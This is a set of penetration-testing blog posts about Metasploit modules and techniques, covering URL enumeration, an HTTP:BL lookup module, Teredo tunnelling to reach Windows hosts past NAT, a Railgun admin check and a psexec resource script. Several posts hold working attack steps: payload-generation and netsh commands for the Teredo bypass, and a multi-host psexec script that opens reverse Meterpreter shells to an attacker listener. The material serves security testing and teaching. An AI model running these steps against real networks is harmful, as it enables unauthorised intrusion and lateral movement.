[UPDATE] This module (enum_delicious) has been pulled from Metasploit since Delicious no longer allows searching by site.
In the last post I showed off how Archive.org’s Wayback machine can be used to pull urls for a domain, another place where URLs are stored and can be searched by domain is Delicious.com (a bookmarking service). I’ve seen people bookmark everything from internal web portals to urls with special no-auth passwords in them. It may even reveal subdomains and hosts you didn’t know about. This can be a very handy set of data.
Be forewarned though, Delicious has been putting ads in the results and I haven’t gotten a solid regex to work on picking them out yet. So comb your results before slamming them in the requestor script from the last post. The module works basically the same way, but here it is in action:
Archive.org allows you to check the history of sites and pages, but a service most are not aware of is one that allows you to get a list of every page that a Archive.org has for a given domain. This is great for enumerating a web applications, many times you’ll find parts of web apps that have been long forgotten (and usually vulnerable).
This module doesn’t make any requests to the targeted domain, it simply outputs a list to the screen/or a file of all the pages it has found on Archive.org.
msf auxiliary(enum_wayback) > info
Name: Pull Archive.org stored URLs for a domain
Version: 10394
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Rob Fuller
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN portswigger.net yes Domain to request URLS for
OUTFILE no Where to output the list for use
Description:
This module pulls and parses the URLs stored by Archive.org for the
purpose of replaying during a web assessment. Finding unlinked and
old pages.
msf auxiliary(enum_wayback) > run
[*] Pulling urls from Archive.org
[*] Located 289 addresses for portswigger.net
http://portswigger.net/
http://portswigger.net/books/
http://portswigger.net/burp/
http://portswigger.net/burp/bullet.gif
http://portswigger.net/burp/buy.html
http://portswigger.net/burp/help.html
http://portswigger.net/burp/ps.css
http://portswigger.net/burp/screenshots.html
http://portswigger.net/burp/tc.html
http://portswigger.net/corner.gif
**SNIPPED**
You can set the OUTFILE so that you can parse it a bit and import it into Burp, or use a quick script to make the queries yourself. Here is one I wrote in python:
Most malicious IP lists focus on the client side threat, where servers (hosted or exploited) host client side exploits or evil scripting.
These don’t really help the server admins very much. Project Honeypot does an amazing job at keeping detailed information on scanners / harvesters and brute forcers, the likes of which are the daily enemy of said admins. They offer a service called HTTP Block List or ‘HTTP:BL’.
Another way this list differs from the rest is it isn’t a list you can download. Its a DNS service. Simply put, you submit a query, it gives an (A) record that looks something like ‘127.3.5.1’. Disregard the 127, but the rest of the details pertain to different details about the IP you requested. You can read the documentation here: http://www.projecthoneypot.org/httpbl_api.php for an explanation on exactly how it works, or you can read the code of the Metasploit module I wrote for it.
I wrote it in Metasploit for 2 reasons. 1) RangeWalker is awesome code, and allows you to query a list of IPs, a range, or a single IP with ease. 2) All of the other implementations of the API that they have listed are for CMSs (to actively block IPs that come back ‘bad’).
This will mostly come in useful for incident responders who are trying to get a bead on a bunch of hosts, or for web admins who want to pull the code out for an active blocking system of their own.
msf auxiliary(httpbl_lookup) > info
Name: Http:BL lookup
Version: xxxx
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Rob Fuller
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
APIKEY xxxxxxxxxxxx yes Your HTTP:BL api key
RHOSTS 88.229.108.0/24 yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads
Description:
This module can be used to enumerate information about a IP
addresses from Project HoneyPot's HTTP Block List.
References:
link (<a href="http://www.projecthoneypot.org/httpbl_api.php">http://www.projecthoneypot.org/httpbl_api.php</a>)
msf auxiliary(httpbl_lookup) > run
[*]
[*] 88.229.108.0 resloves to 127.51.8.1 which means: Suspicious
[*] => it was last seen 51 day ago and has a threat score of 8 or 'less than 100 spam messages'
[*] => more info here: <a href="http://www.projecthoneypot.org/ip_88.229.108.0">http://www.projecthoneypot.org/ip_88.229.108.0</a>
[*]
[*] 88.229.108.1 resloves to 127.29.8.1 which means: Suspicious
[*] => it was last seen 29 day ago and has a threat score of 8 or 'less than 100 spam messages'
[*] => more info here: <a href="http://www.projecthoneypot.org/ip_88.229.108.1">http://www.projecthoneypot.org/ip_88.229.108.1</a>
[*]
[*] 88.229.108.2 resloves to 127.29.8.1 which means: Suspicious
[*] => it was last seen 29 day ago and has a threat score of 8 or 'less than 100 spam messages'
[*] => more info here: <a href="http://www.projecthoneypot.org/ip_88.229.108.2">http://www.projecthoneypot.org/ip_88.229.108.2</a>
[*]
[*] 88.229.108.254 resloves to 127.51.8.1 which means: Suspicious
[*] => it was last seen 51 day ago and has a threat score of 8 or 'less than 100 spam messages'
[*] => more info here: <a href="http://www.projecthoneypot.org/ip_88.229.108.254">http://www.projecthoneypot.org/ip_88.229.108.254</a>
[*]
[*] 88.229.108.255 resloves to 127.29.8.1 which means: Suspicious
[*] => it was last seen 29 day ago and has a threat score of 8 or 'less than 100 spam messages'
[*] => more info here: <a href="http://www.projecthoneypot.org/ip_88.229.108.255">http://www.projecthoneypot.org/ip_88.229.108.255</a>
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(httpbl_lookup) >
At the April 2010 NoVA Hackers meeting I discussed some of the offensive uses of IPv6 on current networks. Well, around that time Microsoft issued a patch to all of the supported versions of Windows that broke my methodology. Obviously I wasn’t the only one doing this ;–)
Before I get ahead of myself lets explain what Teredo is. Teredo is a tunneling service built in to Windows. It’s intent, as far as I can tell, was to allow anyone to have access to the IPv6 enabled internet, free, and dead simple, no infrastructure changes needed. You can get into much more detail on the Teredo TechNet article, but essentially an internal host is asking a Teredo server/relay for an IPv6 IP address. It does this over UDP and which by default in Windows points to teredo.ipv6.microsoft.com over port 3544 (UDP).
When the tunnel is established, the host is given a 2001::/32 address. This address is a public IP. Before April this essentially meant that your Windows shares and any other listening service was publically available, despite your NAT and Firewall.
This isn’t as much of a problem as you might think as it’s virtually impossible to guess or scan for an IPv6 address. So, unless you displayed it publically by connecting to Freenode or posting it online somewhere (via a demonstration video). You’re pretty safe.
THE PATCH
Microsoft made this a certainty when they issued the patch. I was unable to locate the specific one, or even identify for certain that it was April 2010, but that’s when the initial article for IPV6_PROTECTION_LEVEL was published. This is a socket level option that says, unless this flag is set to “PROTECTION_LEVEL_UNRESTRICTED” on the binary that is doing the communication, deny all traffic from NAT Traversals (Teredo). (Even Netcat6 doesn’t have this flag set!)
Essentially, unless someone rebuilt their binary with the explicit intention to allow people to connect to it over NAT Traversals, the traffic was denied. You were still allowed to connect out, keeping in tact the initial idea for Teredo, but it broke my methodology damn it!
I used Teredo to connect to the SMB server so that I could psexec a shell back any time I wanted before (still possible on non-patched systems) but since Microsoft doesn’t want to add the PROTECTION_LEVEL_UNRESTRICTED flag to SMB you have to just upload and use a binary that does. Luckily, with the help of Stephen Fewer, the bind_ipv6_tcp payload in Metasploit does.
COMMANDS
The commands used in the video are below:
netsh interface ipv6 install
netsh interface ipv6 set teredo enterpriseclient
./mspfayload windows/meterpreter/bind_ipv6_tcp LPORT=9001 X > bind.exe
The only thing that was behind the scenes was giving my Metasploit host an IPv6 address. I used Miredo (Teredo for *nix/OSX):
12345
# Install miredo
apt-get install miredo
#Remove it from starting automatically
update-rc.d miredo -f remove
PROTECTION
Yes, it’s that easy. Now, some of the mitigating suggestions I’ve seen on the net is to blackhole the Microsoft Teredo server, or block the UDP port 3544. However, Miredo can act as a Teredo server/relay just fine, and can listen on any port you wish (53?). So unless you block ALL UDP outbound traffic, you are not protecting against this threat.
This is part one in a series of presentations I will be giving at the NoVAHackers meetings on forensics of all kinds as it can be leveraged in a penetration test.
When you first step on a machine, you want to determine quickly if you are just a user or an administrator. Meterpreter doesn’t have a way to quickly check this. You could drop to a shell, check the local users group “Adminitrators”, and check your user, and correlate any groups that are shared between the outputs. You could do ‘getsystem’ and if one works other than Kitrap0d. You could also just do a ‘ps’ and notice that you can see ‘SYSTEM’ processes.
But, I wanted to make a way that check a bunch of sessions all at once. So I wrote “AmIAdmin.rb” which uses meterpreter’s railgun extension to execute “IsUserAdmin”.
Being that Shell32.dll isn’t included in railgun by default we have to add it. After writing it I decided to add some checks. These checks make sure that each piece of the script isn’t already loaded. It’s a good reference for doing this in the future.
(you can remove the print_status lines if you want the script to be quieter)
ifclient.platform=="x64/win32"print_status"Railgun is currently not supported for x64 bit systems"raiseRex::Script::Completedendifclient.railgun.present?==trueprint_status"Railgun already loaded.. skipping"elseprint_status"Loading Railgun"client.core.use("railgun")endifclient.railgun.dll['shell32']==nilprint_status"Adding Shell32.dll"client.railgun.add_dll('shell32','shell32')elseprint_status"Shell32 already loaded.. skipping"endif(client.railgun.shell32.functions['IsUserAnAdmin']==nilprint_status"Adding the IsUserAnAdmin function"client.railgun.add_function('shell32','IsUserAnAdmin','BOOL',[])elseprint_status"IsUserAnAdmin already loaded.. skipping"endprint_status"Running the IsUserAnAdmin function"status=client.railgun.shell32.IsUserAnAdmin()ifstatus["return"]==truethenprint_status"You are an administrator"elseprint_error"You are not an administrator"end
Exploit modules inside of metasploit don’t have the ability to run on multiple hosts with one swing of the bat. So I created some code to facilitate that. It’s really not much but there are some really juicy pieces of knowledge I learned on the way here.
// The following is a resource file, but instead of just giving you something to download or straight copy and paste, I’ve broken it up into sections. Also take note of the “setg” which sets the variable globally so that I don’t have to set it inside of the psexec module.
1234567
use multi/handler
setg PAYLOAD windows/meterpreter/reverse_tcp
setg LHOST 192.168.1.114
setg LPORT 80
set ExitOnSession false
exploit -j -z
This first part, while nothing spectacular, sets the multi/handler up before hand so that each run of the exploit module doesn’t have to set up and tear down the handler. = fast. The following though is just the setup for the module.
123
use windows/smb/psexec
set SMBUser Administrator
set SMBPass password123
Here is where it gets interesting though. Windows systems want something in SMBDomain, if they aren’t joined to a domain they can take pretty much anything here.
However if they are actually joined to a domain, you either have to have the computer name (which definitely won’t play well with a scanner easily) or use domain credentials.
1
set SMBDomain .
The “.” is something every Windows API programmer would know as it’s really well documented, but certainly not every Metasploit user. What it means is basically localhost, since SMB won’t take either localhost or 127.0.0.1.
Next up, we don’t want each run of the exploit module to build the multi/handler and tear it down every single run. That’s why we built it first and set DisablePayloadHandler inside of the psexec module.
1
set DisablePayloadHandler true
Resource files have been able run blocks of ruby in metasploit since revision 8876. By putting the <ruby> html like block identifier you can then use the power of Ruby combined with Rex (Metasploit’s API) to do really cool stuff.
More setup, but this time for the ruby portion. Using Metasploit’s RangeWalker, we can take all kinds of input, an IP, a CIDR range, and even a line separated file of IP addresses using the “file:” prefix.
So, we’ve included RangeWalker, parsed it, and loaded it into an ‘each’ for loop.
The self.run_single function allows you to send commands like you were outside of the ruby block to msfconsole. We are setting the RHOST to each IP that RangeWalker parsed out, simple right?
That’s it, we send all of the exploit modules one at a time to the background and tell it not to interact with it using the “-z -j” just as we did with multi/handler.
Now, if your credentials worked on any of the IPs you’ll have sessions waiting for you.
This can easily be extended with one more loop and a bit of shuffling to make this in to a SMB bruteforcer that accepts hashes!.
Hope you learned a few things. Oh, and just a caveat, this is NOT quiet or stealthy and will probably get you caught on a blackbox pentest, but this is really great for the smash and grab style of CTF competitions.